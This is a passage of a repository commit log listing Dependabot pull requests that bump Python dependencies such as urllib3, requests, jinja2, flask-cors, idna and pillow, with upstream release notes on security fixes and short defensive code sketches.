- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)

You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:09:16 +08:00
bbf9d6d786 build(deps): bump urllib3 from 2.2.1 to 2.2.2 (#1672)
Bumps [urllib3](https://github.com/urllib3/urllib3) from 2.2.1 to 2.2.2.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/urllib3/urllib3/releases">urllib3's
releases</a>.</em></p>
<blockquote>
<h2>2.2.2</h2>
<h2>🚀 urllib3 is fundraising for HTTP/2 support</h2>
<p><a
href="https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support">urllib3
is raising ~$40,000 USD</a> to release HTTP/2 support and ensure
long-term sustainable maintenance of the project after a sharp decline
in financial support for 2023. If your company or organization uses
Python and would benefit from HTTP/2 support in Requests, pip, cloud
SDKs, and thousands of other projects <a
href="https://opencollective.com/urllib3">please consider contributing
financially</a> to ensure HTTP/2 support is developed sustainably and
maintained for the long-haul.</p>
<p>Thank you for your support.</p>
<h2>Changes</h2>
<ul>
<li>Added the <code>Proxy-Authorization</code> header to the list of
headers to strip from requests when redirecting to a different host. As
before, different headers can be set via
<code>Retry.remove_headers_on_redirect</code>.</li>
<li>Allowed passing negative integers as <code>amt</code> to read
methods of <code>http.client.HTTPResponse</code> as an alternative to
<code>None</code>. (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3122">#3122</a>)</li>
<li>Fixed return types representing copying actions to use
<code>typing.Self</code>. (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3363">#3363</a>)</li>
</ul>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/urllib3/urllib3/compare/2.2.1...2.2.2">https://github.com/urllib3/urllib3/compare/2.2.1...2.2.2</a></p>
</blockquote>
</details>
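
The redirect rule described in the release notes above can be illustrated with a small standard-library sketch. It is not urllib3's code: the helper name `headers_for_redirect` and the contents of `STRIP_ON_CROSS_HOST_REDIRECT` are assumptions made for illustration (the notes only confirm that `Proxy-Authorization` was added to urllib3's list).

```python
from urllib.parse import urlsplit

# Assumed header set for this sketch; only Proxy-Authorization is confirmed
# by the release note as part of urllib3's own list.
STRIP_ON_CROSS_HOST_REDIRECT = frozenset(
    {"authorization", "cookie", "proxy-authorization"}
)


def headers_for_redirect(headers, old_url, new_url,
                         strip=STRIP_ON_CROSS_HOST_REDIRECT):
    """Return a copy of headers, dropping sensitive ones when the host changes."""
    if urlsplit(old_url).hostname == urlsplit(new_url).hostname:
        # Same host: nothing is stripped.
        return dict(headers)
    # Different host: compare header names case-insensitively.
    return {k: v for k, v in headers.items() if k.lower() not in strip}
```

In urllib3 itself, the set of stripped headers is configured through `Retry.remove_headers_on_redirect`, as the release notes state.
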
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/urllib3/urllib3/blob/main/CHANGES.rst">urllib3's
changelog</a>.</em></p>
<blockquote>
<h1>2.2.2 (2024-06-17)</h1>
<ul>
<li>Added the <code>Proxy-Authorization</code> header to the list of
headers to strip from requests when redirecting to a different host. As
before, different headers can be set via
<code>Retry.remove_headers_on_redirect</code>.</li>
<li>Allowed passing negative integers as <code>amt</code> to read
methods of <code>http.client.HTTPResponse</code> as an alternative to
<code>None</code>.
(<a href="https://github.com/urllib3/urllib3/issues/3122">#3122</a>)</li>
<li>Fixed return types representing copying actions to use
<code>typing.Self</code>.
(<a href="https://github.com/urllib3/urllib3/issues/3363">#3363</a>)</li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="27e2a5c5a7"><code>27e2a5c</code></a>
Release 2.2.2 (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3406">#3406</a>)</li>
<li><a
href="accff72ecc"><code>accff72</code></a>
Merge pull request from GHSA-34jh-p97f-mpxf</li>
<li><a
href="34be4a57e5"><code>34be4a5</code></a>
Pin CFFI to a new release candidate instead of a Git commit (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3398">#3398</a>)</li>
<li><a
href="da410581b6"><code>da41058</code></a>
Bump browser-actions/setup-chrome from 1.6.0 to 1.7.1 (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3399">#3399</a>)</li>
<li><a
href="b07a669bd9"><code>b07a669</code></a>
Bump github/codeql-action from 2.13.4 to 3.25.6 (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3396">#3396</a>)</li>
<li><a
href="b8589ec9f8"><code>b8589ec</code></a>
Measure coverage with v4 of artifact actions (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3394">#3394</a>)</li>
<li><a
href="f3bdc55851"><code>f3bdc55</code></a>
Allow triggering CI manually (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3391">#3391</a>)</li>
<li><a
href="52392654b3"><code>5239265</code></a>
Fix HTTP version in debug log (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3316">#3316</a>)</li>
<li><a
href="b34619f94e"><code>b34619f</code></a>
Bump actions/checkout to 4.1.4 (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3387">#3387</a>)</li>
<li><a
href="9961d14de7"><code>9961d14</code></a>
Bump browser-actions/setup-chrome from 1.5.0 to 1.6.0 (<a
href="https://redirect.github.com/urllib3/urllib3/issues/3386">#3386</a>)</li>
<li>Additional commits viewable in <a
href="https://github.com/urllib3/urllib3/compare/2.2.1...2.2.2">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=urllib3&package-manager=pip&previous-version=2.2.1&new-version=2.2.2)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)


Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:09:04 +08:00
8c2b91d3db build(deps): bump requests from 2.31.0 to 2.32.2 (#1673)
Bumps [requests](https://github.com/psf/requests) from 2.31.0 to 2.32.2.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/psf/requests/releases">requests's
releases</a>.</em></p>
<blockquote>
<h2>v2.32.2</h2>
<h2>2.32.2 (2024-05-21)</h2>
<p><strong>Deprecations</strong></p>
<ul>
<li>
<p>To provide a more stable migration for custom HTTPAdapters impacted
by the CVE changes in 2.32.0, we've renamed <code>_get_connection</code>
to
a new public API, <code>get_connection_with_tls_context</code>. Existing
custom
HTTPAdapters will need to migrate their code to use this new API.
<code>get_connection</code> is considered deprecated in all versions of
Requests&gt;=2.32.0.</p>
<p>A minimal (2-line) example has been provided in the linked PR to ease
migration, but we strongly urge users to evaluate if their custom
adapter
is subject to the same issue described in CVE-2024-35195. (<a
href="https://redirect.github.com/psf/requests/issues/6710">#6710</a>)</p>
</li>
</ul>
<h2>v2.32.1</h2>
<h2>2.32.1 (2024-05-20)</h2>
<p><strong>Bugfixes</strong></p>
<ul>
<li>Add missing test certs to the sdist distributed on PyPI.</li>
</ul>
<h2>v2.32.0</h2>
<h2>2.32.0 (2024-05-20)</h2>
<h2>🐍 PYCON US 2024 EDITION 🐍</h2>
<p><strong>Security</strong></p>
<ul>
<li>Fixed an issue where setting <code>verify=False</code> on the first
request from a
Session will cause subsequent requests to the <em>same origin</em> to
also ignore
cert verification, regardless of the value of <code>verify</code>.
(<a
href="https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56">https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56</a>)</li>
</ul>
<p><strong>Improvements</strong></p>
<ul>
<li><code>verify=True</code> now reuses a global SSLContext which should
improve
request time variance between first and subsequent requests. It should
also minimize certificate load time on Windows systems when using a
Python
version built with OpenSSL 3.x. (<a
href="https://redirect.github.com/psf/requests/issues/6667">#6667</a>)</li>
<li>Requests now supports optional use of character detection
(<code>chardet</code> or <code>charset_normalizer</code>) when
repackaged or vendored.
This enables <code>pip</code> and other projects to minimize their
vendoring
surface area. The <code>Response.text()</code> and
<code>apparent_encoding</code> APIs
will default to <code>utf-8</code> if neither library is present. (<a
href="https://redirect.github.com/psf/requests/issues/6702">#6702</a>)</li>
</ul>
<p><strong>Bugfixes</strong></p>
<ul>
<li>Fixed bug in length detection where emoji length was incorrectly
calculated in the request content-length. (<a
href="https://redirect.github.com/psf/requests/issues/6589">#6589</a>)</li>
<li>Fixed deserialization bug in JSONDecodeError. (<a
href="https://redirect.github.com/psf/requests/issues/6629">#6629</a>)</li>
<li>Fixed bug where an extra leading <code>/</code> (path separator)
could lead
urllib3 to unnecessarily reparse the request URI. (<a
href="https://redirect.github.com/psf/requests/issues/6644">#6644</a>)</li>
</ul>
</blockquote>
<p>... (truncated)</p>
</details>
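
The `verify=False` issue in the 2.32.0 security note above can be pictured with a toy model. This is one plausible way such a bug arises, not Requests' actual code: `ToyPool` and its `include_verify_in_key` flag are hypothetical names. The model assumes that a cache of connections keyed only by origin will hand back a connection created with a different `verify` setting.

```python
class ToyPool:
    """Toy connection cache; include_verify_in_key models the safer keying."""

    def __init__(self, include_verify_in_key):
        self.include_verify_in_key = include_verify_in_key
        self._cache = {}

    def get(self, origin, verify):
        key = (origin, verify) if self.include_verify_in_key else (origin,)
        # A cached entry keeps whatever verify setting it was created with.
        return self._cache.setdefault(key, {"origin": origin, "verify": verify})


# Keyed by origin only: the second caller inherits verify=False.
buggy = ToyPool(include_verify_in_key=False)
buggy.get("https://example.org", verify=False)
leaked = buggy.get("https://example.org", verify=True)

# Keyed by origin and verify: each setting gets its own entry.
fixed = ToyPool(include_verify_in_key=True)
fixed.get("https://example.org", verify=False)
safe = fixed.get("https://example.org", verify=True)
```

Here `leaked["verify"]` is `False` even though the caller asked for verification, while `safe["verify"]` is `True`.
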
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/psf/requests/blob/main/HISTORY.md">requests's
changelog</a>.</em></p>
<blockquote>
<h2>2.32.2 (2024-05-21)</h2>
<p><strong>Deprecations</strong></p>
<ul>
<li>
<p>To provide a more stable migration for custom HTTPAdapters impacted
by the CVE changes in 2.32.0, we've renamed <code>_get_connection</code>
to
a new public API, <code>get_connection_with_tls_context</code>. Existing
custom
HTTPAdapters will need to migrate their code to use this new API.
<code>get_connection</code> is considered deprecated in all versions of
Requests&gt;=2.32.0.</p>
<p>A minimal (2-line) example has been provided in the linked PR to ease
migration, but we strongly urge users to evaluate if their custom
adapter
is subject to the same issue described in CVE-2024-35195. (<a
href="https://redirect.github.com/psf/requests/issues/6710">#6710</a>)</p>
</li>
</ul>
<h2>2.32.1 (2024-05-20)</h2>
<p><strong>Bugfixes</strong></p>
<ul>
<li>Add missing test certs to the sdist distributed on PyPI.</li>
</ul>
<h2>2.32.0 (2024-05-20)</h2>
<p><strong>Security</strong></p>
<ul>
<li>Fixed an issue where setting <code>verify=False</code> on the first
request from a
Session will cause subsequent requests to the <em>same origin</em> to
also ignore
cert verification, regardless of the value of <code>verify</code>.
(<a
href="https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56">https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56</a>)</li>
</ul>
<p><strong>Improvements</strong></p>
<ul>
<li><code>verify=True</code> now reuses a global SSLContext which should
improve
request time variance between first and subsequent requests. It should
also minimize certificate load time on Windows systems when using a
Python
version built with OpenSSL 3.x. (<a
href="https://redirect.github.com/psf/requests/issues/6667">#6667</a>)</li>
<li>Requests now supports optional use of character detection
(<code>chardet</code> or <code>charset_normalizer</code>) when
repackaged or vendored.
This enables <code>pip</code> and other projects to minimize their
vendoring
surface area. The <code>Response.text()</code> and
<code>apparent_encoding</code> APIs
will default to <code>utf-8</code> if neither library is present. (<a
href="https://redirect.github.com/psf/requests/issues/6702">#6702</a>)</li>
</ul>
<p><strong>Bugfixes</strong></p>
<ul>
<li>Fixed bug in length detection where emoji length was incorrectly
calculated in the request content-length. (<a
href="https://redirect.github.com/psf/requests/issues/6589">#6589</a>)</li>
<li>Fixed deserialization bug in JSONDecodeError. (<a
href="https://redirect.github.com/psf/requests/issues/6629">#6629</a>)</li>
<li>Fixed bug where an extra leading <code>/</code> (path separator)
could lead
urllib3 to unnecessarily reparse the request URI. (<a
href="https://redirect.github.com/psf/requests/issues/6644">#6644</a>)</li>
</ul>
<p><strong>Deprecations</strong></p>
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="88dce9d854"><code>88dce9d</code></a>
v2.32.2</li>
<li><a
href="c98e4d133e"><code>c98e4d1</code></a>
Merge pull request <a
href="https://redirect.github.com/psf/requests/issues/6710">#6710</a>
from nateprewitt/api_rename</li>
<li><a
href="92075b330a"><code>92075b3</code></a>
Add deprecation warning</li>
<li><a
href="aa1461b68a"><code>aa1461b</code></a>
Move _get_connection to get_connection_with_tls_context</li>
<li><a
href="970e8cec98"><code>970e8ce</code></a>
v2.32.1</li>
<li><a
href="d6ebc4a2f1"><code>d6ebc4a</code></a>
v2.32.0</li>
<li><a
href="9a40d12778"><code>9a40d12</code></a>
Avoid reloading root certificates to improve concurrent performance (<a
href="https://redirect.github.com/psf/requests/issues/6667">#6667</a>)</li>
<li><a
href="0c030f78d2"><code>0c030f7</code></a>
Merge pull request <a
href="https://redirect.github.com/psf/requests/issues/6702">#6702</a>
from nateprewitt/no_char_detection</li>
<li><a
href="555b870eb1"><code>555b870</code></a>
Allow character detection dependencies to be optional in post-packaging
steps</li>
<li><a
href="d6dded3f00"><code>d6dded3</code></a>
Merge pull request <a
href="https://redirect.github.com/psf/requests/issues/6700">#6700</a>
from franekmagiera/update-redirect-to-invalid-uri-test</li>
<li>Additional commits viewable in <a
href="https://github.com/psf/requests/compare/v2.31.0...v2.32.2">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=requests&package-manager=pip&previous-version=2.31.0&new-version=2.32.2)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:08:48 +08:00
55028b2db7 build(deps): bump jinja2 from 3.1.3 to 3.1.4 (#1674)
Bumps [jinja2](https://github.com/pallets/jinja) from 3.1.3 to 3.1.4.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/pallets/jinja/releases">jinja2's
releases</a>.</em></p>
<blockquote>
<h2>3.1.4</h2>
<p>This is the Jinja 3.1.4 security release, which fixes security issues
and bugs but does not otherwise change behavior and should not result in
breaking changes.</p>
<p>PyPI: <a
href="https://pypi.org/project/Jinja2/3.1.4/">https://pypi.org/project/Jinja2/3.1.4/</a>
Changes: <a
href="https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4">https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4</a></p>
<ul>
<li>The <code>xmlattr</code> filter does not allow keys with
<code>/</code> solidus, <code>&gt;</code> greater-than sign, or
<code>=</code> equals sign, in addition to disallowing spaces.
Regardless of any validation done by Jinja, user input should never be
used as keys to this filter, or must be separately validated first.
GHSA-h75v-3vvj-5mfj</li>
</ul>
</blockquote>
</details>
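
Because the release note says user input must be validated separately before it is used as an `xmlattr` key, a caller-side check might look like the sketch below. It is not Jinja's implementation: `is_safe_attr_key` is a hypothetical helper. Rejecting all whitespace (rather than only spaces) and rejecting empty keys are extra assumptions of this sketch.

```python
import re

# Characters named in the release note: spaces, "/", ">", and "=".
# \s is used here, so other whitespace is rejected too (an assumption).
_INVALID_KEY_CHARS = re.compile(r"[\s/>=]")


def is_safe_attr_key(key: str) -> bool:
    """Return True if key contains none of the disallowed characters."""
    # Empty keys are rejected as well; that is a choice made in this sketch.
    return bool(key) and _INVALID_KEY_CHARS.search(key) is None
```

A template caller could filter a dictionary with this check before passing it to `xmlattr`, instead of relying on the filter to reject bad keys.
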
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/pallets/jinja/blob/main/CHANGES.rst">jinja2's
changelog</a>.</em></p>
<blockquote>
<h2>Version 3.1.4</h2>
<p>Released 2024-05-05</p>
<ul>
<li>The <code>xmlattr</code> filter does not allow keys with
<code>/</code> solidus, <code>&gt;</code>
greater-than sign, or <code>=</code> equals sign, in addition to
disallowing spaces.
Regardless of any validation done by Jinja, user input should never be
used
as keys to this filter, or must be separately validated first.
GHSA-h75v-3vvj-5mfj</li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="dd4a8b5466"><code>dd4a8b5</code></a>
release version 3.1.4</li>
<li><a
href="0668239dc6"><code>0668239</code></a>
Merge pull request from GHSA-h75v-3vvj-5mfj</li>
<li><a
href="d655030770"><code>d655030</code></a>
disallow invalid characters in keys to xmlattr filter</li>
<li><a
href="a7863ba9d3"><code>a7863ba</code></a>
add ghsa links</li>
<li><a
href="b5c98e78c2"><code>b5c98e7</code></a>
start version 3.1.4</li>
<li><a
href="da3a9f0b80"><code>da3a9f0</code></a>
update project files (<a
href="https://redirect.github.com/pallets/jinja/issues/1968">#1968</a>)</li>
<li><a
href="0ee5eb41d1"><code>0ee5eb4</code></a>
satisfy formatter, linter, and strict mypy</li>
<li><a
href="20477c6357"><code>20477c6</code></a>
update project files (<a
href="https://redirect.github.com/pallets/jinja/issues/5457">#5457</a>)</li>
<li><a
href="e491223739"><code>e491223</code></a>
update pyyaml dev dependency</li>
<li><a
href="36f98854c7"><code>36f9885</code></a>
fix pr link</li>
<li>Additional commits viewable in <a
href="https://github.com/pallets/jinja/compare/3.1.3...3.1.4">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=jinja2&package-manager=pip&previous-version=3.1.3&new-version=3.1.4)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:08:22 +08:00
daf86dbf74 build(deps): bump flask-cors from 4.0.0 to 4.0.1 (#1675)
Bumps [flask-cors](https://github.com/corydolphin/flask-cors) from 4.0.0
to 4.0.1.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/corydolphin/flask-cors/releases">flask-cors's
releases</a>.</em></p>
<blockquote>
<h2>4.0.1</h2>
<h2>What's Changed</h2>
<ul>
<li>Fix Read the Docs builds by <a
href="https://github.com/kurtmckee"><code>@​kurtmckee</code></a> in <a
href="https://redirect.github.com/corydolphin/flask-cors/pull/345">corydolphin/flask-cors#345</a></li>
<li>Update extension.py to clean request.path before logging it by <a
href="https://github.com/aneshujevic"><code>@​aneshujevic</code></a> in
<a
href="https://redirect.github.com/corydolphin/flask-cors/pull/351">corydolphin/flask-cors#351</a></li>
<li>Update CI to include Python 3.12 and flask 3.0.3 by <a
href="https://github.com/corydolphin"><code>@​corydolphin</code></a> in
<a
href="https://redirect.github.com/corydolphin/flask-cors/pull/354">corydolphin/flask-cors#354</a></li>
<li>Release 4.0.1 by <a
href="https://github.com/corydolphin"><code>@​corydolphin</code></a> in
<a
href="https://redirect.github.com/corydolphin/flask-cors/pull/353">corydolphin/flask-cors#353</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a href="https://github.com/kurtmckee"><code>@​kurtmckee</code></a>
made their first contribution in <a
href="https://redirect.github.com/corydolphin/flask-cors/pull/345">corydolphin/flask-cors#345</a></li>
<li><a
href="https://github.com/aneshujevic"><code>@​aneshujevic</code></a>
made their first contribution in <a
href="https://redirect.github.com/corydolphin/flask-cors/pull/351">corydolphin/flask-cors#351</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/corydolphin/flask-cors/compare/4.0.0...4.0.1">https://github.com/corydolphin/flask-cors/compare/4.0.0...4.0.1</a></p>
</blockquote>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/corydolphin/flask-cors/blob/main/CHANGELOG.md">flask-cors's
changelog</a>.</em></p>
<blockquote>
<h2>4.0.1</h2>
<h3>Security</h3>
<ul>
<li>Address <a
href="https://github.com/advisories/GHSA-84pr-m4jr-85g5">CVE-2024-1681</a>
which is a log injection vulnerability when the log level is set to
debug by <a
href="https://github.com/aneshujevic"><code>@​aneshujevic</code></a> in
<a
href="https://redirect.github.com/corydolphin/flask-cors/pull/351">corydolphin/flask-cors#351</a></li>
</ul>
</blockquote>
</details>
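
The log injection class addressed above can be sketched in a few lines. This is a minimal illustration and not necessarily the exact change made in flask-cors: `sanitize_for_log` is a hypothetical helper that escapes carriage returns and line feeds, so a crafted request path cannot start a forged log line.

```python
def sanitize_for_log(value: str) -> str:
    """Escape CR and LF so the value stays on a single log line."""
    return value.replace("\r", "\\r").replace("\n", "\\n")


# A path carrying an embedded line break, as an attacker might send it.
crafted_path = "/api\r\nINFO forged entry"
logged = sanitize_for_log(crafted_path)
```

After sanitizing, `logged` contains the literal two-character sequences `\r` and `\n` instead of real line breaks.
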
<details>
<summary>Commits</summary>
<ul>
<li><a
href="1df178ccc0"><code>1df178c</code></a>
Release 0.4.1 (<a
href="https://redirect.github.com/corydolphin/flask-cors/issues/353">#353</a>)</li>
<li><a
href="5090b4a43f"><code>5090b4a</code></a>
Update CI to include Python 3.12 and flask 3.0.3 (<a
href="https://redirect.github.com/corydolphin/flask-cors/issues/354">#354</a>)</li>
<li><a
href="6172c2000d"><code>6172c20</code></a>
Update extension.py to clean request.path before logging it (<a
href="https://redirect.github.com/corydolphin/flask-cors/issues/351">#351</a>)</li>
<li><a
href="cadade9403"><code>cadade9</code></a>
Fix Read the Docs builds (<a
href="https://redirect.github.com/corydolphin/flask-cors/issues/345">#345</a>)</li>
<li>See full diff in <a
href="https://github.com/corydolphin/flask-cors/compare/4.0.0...4.0.1">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=flask-cors&package-manager=pip&previous-version=4.0.0&new-version=4.0.1)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:08:04 +08:00
b2ef6a05a1 build(deps): bump idna from 3.6 to 3.7 (#1676)
Bumps [idna](https://github.com/kjd/idna) from 3.6 to 3.7.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/kjd/idna/releases">idna's
releases</a>.</em></p>
<blockquote>
<h2>v3.7</h2>
<h2>What's Changed</h2>
<ul>
<li>Fix issue where specially crafted inputs to encode() could take an
exceptionally long amount of time to process. [CVE-2024-3651]</li>
</ul>
<p>Thanks to Guido Vranken for reporting the issue.</p>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/kjd/idna/compare/v3.6...v3.7">https://github.com/kjd/idna/compare/v3.6...v3.7</a></p>
</blockquote>
</details>
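
Independently of the upstream fix, callers that encode untrusted hostnames can bound the input first. The sketch below shows that generic defensive habit, not the patch in idna 3.7. `encode_hostname` is a hypothetical helper and the 253-character cap is an assumption of this sketch. It uses Python's built-in `idna` codec as a stand-in, which is a different implementation from the `idna` package.

```python
def encode_hostname(name: str, max_length: int = 253) -> bytes:
    """Reject over-long input before handing it to an IDNA encoder."""
    if len(name) > max_length:
        raise ValueError(f"hostname longer than {max_length} characters")
    # Built-in codec used as a stand-in for the idna package's encode().
    return name.encode("idna")
```

The length check runs before any encoding work, so an oversized input costs only a `len()` call.
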
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/kjd/idna/blob/master/HISTORY.rst">idna's
changelog</a>.</em></p>
<blockquote>
<p>3.7 (2024-04-11)
++++++++++++++++</p>
<ul>
<li>Fix issue where specially crafted inputs to encode() could
take exceptionally long amount of time to process. [CVE-2024-3651]</li>
</ul>
<p>Thanks to Guido Vranken for reporting the issue.</p>
</blockquote>
</details>
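
A reviewer may want to confirm that a pinned or installed `idna` version is at least the patched 3.7 release. The sketch below is an illustration only, not part of the Dependabot change: `version_tuple` and `is_at_least` are hypothetical helper names, and the parsing assumes purely numeric dotted versions such as `3.6` or `3.7`.

```python
from typing import Tuple


def version_tuple(version: str) -> Tuple[int, ...]:
    """Turn a purely numeric dotted version such as '3.7' into (3, 7)."""
    return tuple(int(part) for part in version.split("."))


def is_at_least(installed: str, minimum: str) -> bool:
    """Return True when `installed` is the same as or newer than `minimum`."""
    a, b = version_tuple(installed), version_tuple(minimum)
    # Pad the shorter tuple with zeros so that '3' and '3.0' compare as equal.
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a >= b


# 3.7 is the release that carries the CVE-2024-3651 fix.
print(is_at_least("3.6", "3.7"))
print(is_at_least("3.7", "3.7"))
```

Comparing integer tuples rather than raw strings avoids ordering `3.10` before `3.7`. Versions with pre-release or local suffixes are outside what this sketch handles.
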
<details>
<summary>Commits</summary>
<ul>
<li><a
href="1d365e17e1"><code>1d365e1</code></a>
Release v3.7</li>
<li><a
href="c1b3154939"><code>c1b3154</code></a>
Merge pull request <a
href="https://redirect.github.com/kjd/idna/issues/172">#172</a> from
kjd/optimize-contextj</li>
<li><a
href="0394ec76ff"><code>0394ec7</code></a>
Merge branch 'master' into optimize-contextj</li>
<li><a
href="cd58a23173"><code>cd58a23</code></a>
Merge pull request <a
href="https://redirect.github.com/kjd/idna/issues/152">#152</a> from
elliotwutingfeng/dev</li>
<li><a
href="5beb28b9dd"><code>5beb28b</code></a>
More efficient resolution of joiner contexts</li>
<li><a
href="1b121483ed"><code>1b12148</code></a>
Update ossf/scorecard-action to v2.3.1</li>
<li><a
href="d516b874c3"><code>d516b87</code></a>
Update Github actions/checkout to v4</li>
<li><a
href="c095c75943"><code>c095c75</code></a>
Merge branch 'master' into dev</li>
<li><a
href="60a0a4cb61"><code>60a0a4c</code></a>
Fix typo in GitHub Actions workflow key</li>
<li><a
href="5918a0ef80"><code>5918a0e</code></a>
Merge branch 'master' into dev</li>
<li>Additional commits viewable in <a
href="https://github.com/kjd/idna/compare/v3.6...v3.7">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=idna&package-manager=pip&previous-version=3.6&new-version=3.7)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:07:45 +08:00
6bc3a2d58a build(deps): bump pillow from 10.2.0 to 10.3.0 (#1677)
Bumps [pillow](https://github.com/python-pillow/Pillow) from 10.2.0 to
10.3.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/python-pillow/Pillow/releases">pillow's
releases</a>.</em></p>
<blockquote>
<h2>10.3.0</h2>
<p><a
href="https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html">https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html</a></p>
<h2>Changes</h2>
<ul>
<li>CVE-2024-28219: Use strncpy to avoid buffer overflow <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7928">#7928</a>
[<a href="https://github.com/hugovk"><code>@​hugovk</code></a>]</li>
<li>Use <code>functools.lru_cache</code> for <code>hopper()</code> <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7912">#7912</a>
[<a href="https://github.com/hugovk"><code>@​hugovk</code></a>]</li>
<li>Raise ValueError if seeking to greater than offset-sized integer in
TIFF <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7883">#7883</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Improve speed of loading QOI images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7925">#7925</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Added RGB to I;16N conversion <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7920">#7920</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Add --report argument to <strong>main</strong>.py to omit supported
formats <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7818">#7818</a>
[<a href="https://github.com/nulano"><code>@​nulano</code></a>]</li>
